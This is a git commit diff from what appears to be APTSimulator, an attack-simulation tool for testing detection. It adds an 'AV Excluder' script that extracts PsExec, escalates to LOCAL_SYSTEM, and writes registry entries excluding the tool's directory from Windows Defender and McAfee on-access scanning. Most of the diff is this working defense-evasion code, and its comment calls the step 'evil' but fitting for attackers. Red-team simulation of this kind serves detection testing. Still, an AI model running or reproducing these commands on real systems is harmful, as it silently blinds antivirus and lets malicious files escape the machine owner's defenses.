AV Excluder v0.1

Florian Roth · Florian Roth · commit 3438fe208be1 · 2018-02-24T16:41:56.000+01:00
diff --git a/APTSimulator.bat b/APTSimulator.bat
@@ -77,6 +77,11 @@ SET /P M=Set the maximum seconds to wait:
 SET SECONDMAX=%M%
 GOTO SETTINGS
 
+:AVEXCLUDER
+"%ZIP%" e -p%PASS% %TOOLARCH% -aoa -o"%TEMP%" toolset\avexcluder.bat > NUL
+call "%TEMP%\avexcluder.bat"
+GOTO MENU
+
 :MENU
 CLS
 color 07
@@ -96,6 +101,7 @@ ECHO   [7] Lateral Movement
 ECHO   [8] Persistence
 ECHO   [9] Privilege Escalation
 ECHO.
+ECHO   [A] Apply AV Exclusions in Registry
 ECHO   [S] Settings
 ECHO   [E] Exit
 ECHO.
@@ -113,6 +119,8 @@ IF %M%==8 SET list="persistence"
 IF %M%==9 SET list="privilege-escalation"
 IF %M%==s GOTO SETTINGS
 IF %M%==S GOTO SETTINGS
+IF %M%==a GOTO AVEXCLUDER
+IF %M%==A GOTO AVEXCLUDER
 IF %M%==e GOTO END
 IF %M%==E GOTO END
 
diff --git a/toolset/avexcluder.bat b/toolset/avexcluder.bat
@@ -0,0 +1,35 @@
+@ECHO OFF
+@setlocal EnableDelayedExpansion
+
+ECHO ===========================================================================
+ECHO AV Excluder
+ECHO.
+ECHO We add exclusions for Antivirus products in the local registry
+ECHO I know this is evil but hey, we are attackers with admin rights and not malware, right?
+ping -n 3 127.0.0.1 > NUL
+
+ECHO Extracting PsExec, which is used to swith into LOCAL_SYSTEM context
+"%ZIP%" e -p%PASS% %TOOLARCH% -aoa -o"%APTDIR%" toolset\p.exe > NUL
+ping -n 2 127.0.0.1 > NUL
+
+ECHO ===========================================================================
+ECHO Excluding %APTDIR% for Windows Defender
+"%APTDIR%\p.exe" -accepteula -d -s cmd.exe /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v %APTDIR% /t REG_DWORD /d 0 /f
+
+ping -n 3 127.0.0.1 > NUL
+
+ECHO ===========================================================================
+ECHO Excluding %APTDIR% for McAfee OnAccess Scanner
+FOR /f "tokens=3 delims= " %%a in ('reg query "HKLM\SOFTWARE\Wow6432Node\McAfee\SystemCore\VSCore\On Access Scanner\McShield\Configuration\Default" /v NumExcludeItems') DO set num=%%a
+SET /a NEWNUM=%num%
+SET /a NEWNUM+=1
+SET NewExcludeItem=ExcludedItem_%NEWNUM%
+
+ECHO Adding new exclude item ...
+"%APTDIR%\p.exe" -accepteula -d -s cmd.exe /c REG ADD  "HKLM\SOFTWARE\Wow6432Node\McAfee\SystemCore\VSCore\On Access Scanner\McShield\Configuration\Default" /v %NewExcludeItem% /t REG_SZ /d "3|15|%APTDIR%\*" /f
+ECHO Updating number of exclude items ...
+"%APTDIR%\p.exe" -accepteula -d -s cmd.exe /c REG ADD "HKLM\SOFTWARE\Wow6432Node\McAfee\SystemCore\VSCore\On Access Scanner\McShield\Configuration\Default" /v NumExcludeItems /t REG_DWORD /d %NEWNUM% /f
+
+ping -n 3 127.0.0.1 > NUL
+
+PAUSE
diff --git a/welcome.txt b/welcome.txt
@@ -4,4 +4,4 @@
    / ___ |/ ____/ / /  ___/ / / / / / / / /_/ / / /_/ / /_/ /_/ / /    
   /_/  |_/_/     /_/  /____/_/_/ /_/ /_/\__,_/_/\__,_/\__/\____/_/     
                                                                         
-  Florian Roth, Nextron Systems, v0.6.0
+  Florian Roth, Nextron Systems, v0.7.0
